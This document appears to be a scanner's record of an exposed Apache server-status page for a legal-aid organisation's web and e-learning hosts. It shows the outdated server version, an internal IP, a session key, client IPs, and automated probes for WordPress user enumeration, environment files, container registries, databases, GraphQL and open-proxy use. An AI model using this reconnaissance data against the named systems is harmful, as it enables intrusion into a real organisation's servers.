10-182350/82/134_ 6.6426591180.02.474.76 3.172.83.14http/1.1esign.alas.org:8080GET / HTTP/1.1 11-182400/44/59_ 5.84634300.02.513.29 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-1134140/84/147_ 2.452618100.00.904.25 3.172.83.14http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 13-182500/54/72_ 7.4256672350.02.994.04 206.168.34.115http/1.1atlantalegalaid.org:8080\x16\x03\x01 14-11341926/42/76W 2.480089.10.882.84 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 15-1-0/0/6. 0.686943200.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-1-0/0/10. 1.306946300.00.000.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-1-0/0/6. 0.696943600.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.006947200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.226943000.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.006947100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.566943100.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.006946900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.006947000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feaad388606
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 23-Nov-2025 07:42:42 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 594 Parent Server MPM Generation: 593 Server uptime: 592 days 14 hours 48 minutes 8 seconds Server load: 0.04 0.01 0.00 Total accesses: 13767970 - Total Traffic: 196.2 GB CPU Usage: u83.99 s7.48 cu0 cs0 - .000179% CPU load .269 requests/sec - 4114 B/second - 14.9 kB/request 1 requests currently being processed, 6 idle workers _____._W........................................................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-593206160/13/813392_ 2.52312550.00.7913523.69 130.176.208.182http/1.1atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 1-593206210/7/790091_ 1.27252640.00.3913127.62 130.176.208.182http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 2-593207770/9/758596_ 2.7561690.00.4012976.31 130.176.208.182http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-593211450/4/740711_ 0.86212600.00.2612436.75 130.176.208.182http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 4-593206110/3/720967_ 0.66432670.00.1611910.24 130.176.208.182http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 5-592-0/0/700116. 0.45466000.00.0011610.59 159.203.62.212http/1.1 6-593206050/3/661167_ 0.7093280.00.0310931.97 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 7-5932060625/29/636297W 0.620058.30.1910439.96 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-592-0/0/604008. 0.005869600.00.009832.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-592-0/0/584155. 1.05466000.00.009232.07 130.176.218.136http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 10-592-0/0/514637. 0.005869700.00.008785.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-592-0/0/478945. 0.005869500.00.007907.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-592-0/0/415332. 0.7246603450.00.006621.23 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-592-0/0/328982. 0.15466000.00.004811.60 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-592-0/0/289623. 1.20466000.00.004308.49 3.172.90.70http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 15-592-0/0/265359. 0.005870300.00.003799.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-592-0/0/230553. 0.005870200.00.003443.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-592-0/0/167883. 0.005870100.00.002347.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-592-0/0/145464. 0.005869900.00.002064.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-591-0/0/137653. 0.0012139700.00.002104.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-589-0/0/128327. 0.2031829100.00.001824.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-589-0/0/116787. 3.0230893900.00.001694.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-589-0/0/121177. 0.0431829900.00.001645.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-589-0/0/106169. 0.1831690900.00.001537.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-589-0/0/108758. 0.3131830000.00.001366.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-589-0/0/86009. 0.0031862200.00.001085.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-589-0/0/68650. 0.0031862100.00.001013.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-589-0/0/65111. 0.0031862000.00.00879.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-589-0/0/61981. 0.0031861900.00.00806.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-589-0/0/56797. 0.0031861800.00.00693.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-589-0/0/58169. 0.0031861700.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-589-0/0/53040. 0.0031861600.00.00675.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-589-0/0/57082. 0.0031861500.00.00733.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-589-0/0/53413. 0.0031861400.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-589-0/0/56667. 0.0031861300.00.00671.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-589-0/0/56165. 0.0031861200.00.00668.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-589-0/0/54018. 0.0031861100.00.00655.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-589-0/0/50615. 0.0031861000.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-589-0/0/56921. 0.0031860900.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-589-0/0/50170. 0.0031860800.00.00563.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-589-0/0/49228. 0.0031860700.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-588-0/0/31023. 0.0038935800.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-588-0/0/31949. 0.0038935700.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-588-0/0/31607. 0.0038935600.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-588-0/0/31940. 0.2138918500.00.00329.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-588-0/0/32832. 0.2438916000.00.00314.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001453020600.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001453020500.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001453020400.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001453020300.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001453020200.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001453020100.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001453020000.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001453019900.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001453019800.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001453019700.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001453019600.00.00294.75 ::1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feaa423bd4e
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 21-Nov-2025 07:02:05 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 592 Parent Server MPM Generation: 591 Server uptime: 590 days 14 hours 7 minutes 32 seconds Server load: 0.00 0.00 0.00 Total accesses: 13766344 - Total Traffic: 196.2 GB CPU Usage: u82.72 s7.08 cu0 cs0 - .000176% CPU load .27 requests/sec - 4127 B/second - 14.9 kB/request 1 requests currently being processed, 6 idle workers ____.._W...._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-59151700/0/813201_ 2.0069800.00.0013518.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-59150160/1/789972_ 0.1869610790.00.0013125.08 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1763707827.302284955978393 2-59151790/0/758439_ 1.5669600.00.0012972.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-59150210/1/740572_ 0.286903770.00.0812434.88 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-590-0/0/720884. 0.2722232800.00.0011908.80 130.176.137.70http/1.1elearning.alas.org:8080GET /login/signup.php HTTP/1.1 5-590-0/0/700049. 0.022223220.00.0011600.01 130.176.137.70http/1.1elearning.alas.org:8080GET /login/index.php HTTP/1.1 6-59150260/1/660993_ 0.53415470.00.0310929.31 3.172.13.106http/1.1elearning.alas.org:8080GET / HTTP/1.1 7-591503725/25/636139W 0.050058.30.0610438.29 3.172.13.106http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-590-0/0/603928. 1.083629400.00.009829.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-590-0/0/584035. 2.22222300.00.009231.33 15.158.40.178http/1.1elearning.alas.org:8080GET //site/wp-includes/wlwmanifest.xml HTTP/1.1 10-590-0/0/514631. 0.45222300.00.008785.87 15.158.40.139http/1.1elearning.alas.org:8080GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1 11-590-0/0/478909. 0.243629500.00.007907.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-59150140/1/415242_ 1.3769024350.00.006619.71 3.172.90.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-590-0/0/328943. 0.24222300.00.004811.10 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-589-0/0/289593. 0.0011776200.00.004308.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-589-0/0/265354. 0.0011776100.00.003799.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-589-0/0/230532. 0.0011776000.00.003443.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-589-0/0/167775. 0.2113876300.00.002341.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-589-0/0/145462. 0.0014306500.00.002064.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-589-0/0/137652. 0.5814306400.00.002104.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-589-0/0/128327. 0.2014305400.00.001824.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-589-0/0/116787. 3.0213370300.00.001694.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-589-0/0/121177. 0.0414306200.00.001645.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-589-0/0/106169. 0.1814167200.00.001537.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-589-0/0/108758. 0.3114306300.00.001366.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-589-0/0/86009. 0.0014338500.00.001085.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-589-0/0/68650. 0.0014338400.00.001013.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-589-0/0/65111. 0.0014338300.00.00879.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-589-0/0/61981. 0.0014338200.00.00806.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-589-0/0/56797. 0.0014338100.00.00693.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-589-0/0/58169. 0.0014338000.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-589-0/0/53040. 0.0014337900.00.00675.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-589-0/0/57082. 0.0014337800.00.00733.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-589-0/0/53413. 0.0014337700.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-589-0/0/56667. 0.0014337600.00.00671.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-589-0/0/56165. 0.0014337500.00.00668.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-589-0/0/54018. 0.0014337400.00.00655.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-589-0/0/50615. 0.0014337300.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-589-0/0/56921. 0.0014337200.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-589-0/0/50170. 0.0014337100.00.00563.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-589-0/0/49228. 0.0014337000.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-588-0/0/31023. 0.0021412100.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-588-0/0/31949. 0.0021412000.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-588-0/0/31607. 0.0021411900.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-588-0/0/31940. 0.2121394800.00.00329.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-588-0/0/32832. 0.2421392300.00.00314.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001435496900.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001435496800.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001435496700.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001435496600.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001435496500.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001435496400.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001435496300.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001435496200.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001435496100.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001435496000.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea8890cc37
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 16-Nov-2025 17:00:26 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 587 Parent Server MPM Generation: 586 Server uptime: 586 days 5 minutes 53 seconds Server load: 0.04 0.01 0.00 Total accesses: 13762442 - Total Traffic: 195.8 GB CPU Usage: u311.97 s26.79 cu0 cs0 - .000669% CPU load .272 requests/sec - 4152 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ...____W___.__.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-586-0/0/812885. 2.071834200.00.0013481.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-586-0/0/789729. 2.781834300.00.0013084.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-586-0/0/758140. 1.881833900.00.0012948.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-586316880/17/740317_ 2.29321750.00.6512419.10 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1763312386.617458105087280 4-586316950/52/720598_ 2.83372690.00.8311893.33 130.176.208.182http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 5-586317040/19/699810_ 2.99372650.01.0111567.03 130.176.208.182http/1.1atlantalegalaid.org:8080POST /api/graphql HTTP/1.1 6-586303450/54/660754_ 9.86222740.00.9510905.96 130.176.208.182http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 7-5863170926/75/635839W 2.980088.90.8310403.43 3.172.13.83http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-586303460/23/603704_ 3.75362620.00.929814.76 130.176.208.182http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 9-586324160/18/583789_ 3.22252980.00.989225.54 130.176.208.182http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 10-586324210/52/514459_ 2.96282610.01.008754.96 130.176.208.182http/1.1atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 11-586-0/0/478799. 2.131834100.00.007904.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-586324260/5/415031_ 0.46352680.00.136596.51 130.176.208.182http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 13-586324310/14/328828_ 2.03111490.00.604791.04 130.176.208.182http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-586-0/0/289514. 0.001834000.00.004307.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-585-0/0/265275. 4.568937500.00.003780.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-585-0/0/230473. 0.779750200.00.003442.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580-0/0/167742. 17.7847619500.00.002340.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-579-0/0/145444. 0.0057306600.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.2757307700.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.4256636200.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.8757307500.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.0057306900.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.965565242630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.0057306800.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0060144800.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0060144600.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0060144400.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00284342700.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00284342500.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00284342600.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00284342400.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82929510600.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00936650400.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15926462400.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0692829246620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23928292400.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00936653900.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00936653700.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32928292410080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00936653800.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00936653600.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00936653500.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00936653400.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00936653300.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00936653200.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001395887100.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001395887000.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001395886900.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001395886800.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001395886700.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001395886600.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001395886500.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001395886400.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001395886300.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001395886200.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feae70ba361
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 14-Nov-2025 20:53:27 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 585 Parent Server MPM Generation: 584 Server uptime: 584 days 3 hours 58 minutes 54 seconds Server load: 0.00 0.00 0.00 Total accesses: 13761067 - Total Traffic: 195.8 GB CPU Usage: u290.86 s25.15 cu0 cs0 - .000626% CPU load .273 requests/sec - 4164 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers W______.___..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5841559225/39/812785W 2.440058.30.7813478.06 3.172.13.83http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 1-584154590/50/789647_ 1.16277500.00.3613081.63 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-584154440/19/758056_ 1.49444110.00.6812944.78 130.176.187.246http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?3.17.2/event-mousewheel/event-mousewhe 3-584154430/52/740154_ 2.16369200.00.4812413.55 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-584165720/61/720462_ 3.60168500.00.8511889.27 130.176.137.70http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-584184060/11/699702_ 1.774440.00.9011564.05 3.172.13.83http/1.1elearning.alas.org:8080GET / HTTP/1.1 6-584154490/16/660619_ 1.2518721790.00.4310901.13 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1763151727.823306083679199 7-584-0/0/635724. 0.452011200.00.0010400.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-584154540/85/603607_ 2.324440150.00.939810.74 130.176.187.246http/1.1elearning.alas.org:8080POST /lib/ajax/service.php?sesskey=Tg7jrW6KS4&info=core_fetch_n 9-584184160/42/583705_ 1.2140001600.00.449221.05 130.176.187.246http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 10-584184230/41/514368_ 0.7418724460.00.188751.96 3.172.90.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 11-583-0/0/478724. 0.006889800.00.007901.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-583-0/0/414991. 0.007910000.00.006594.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-583-0/0/328807. 0.007909600.00.004790.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-583-0/0/289499. 0.435210500.00.004306.87 